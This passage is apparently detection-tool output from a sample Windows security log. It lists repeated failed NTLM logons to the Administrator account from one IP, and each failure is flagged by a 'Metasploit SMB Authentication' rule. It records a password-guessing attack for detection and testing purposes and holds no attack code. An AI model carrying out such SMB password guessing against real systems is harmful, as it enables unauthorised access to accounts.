SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: agCtM0s62zXPop0y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVvglj7RtxrBUeXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMbS0sIpbFDqJvMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldO0cAZ54BRHHDyz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OmJH2QWFPiYarKh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5fCiyHtI0OTo8pBO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: e3vkVuU43tsYHUSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3w21sFOu2u7FTDZM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bk7eaqQNK1CEgqoj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rv5joLgkm3QUYPyb : IP Address: 192.168.198.149 : AuthPackage: 
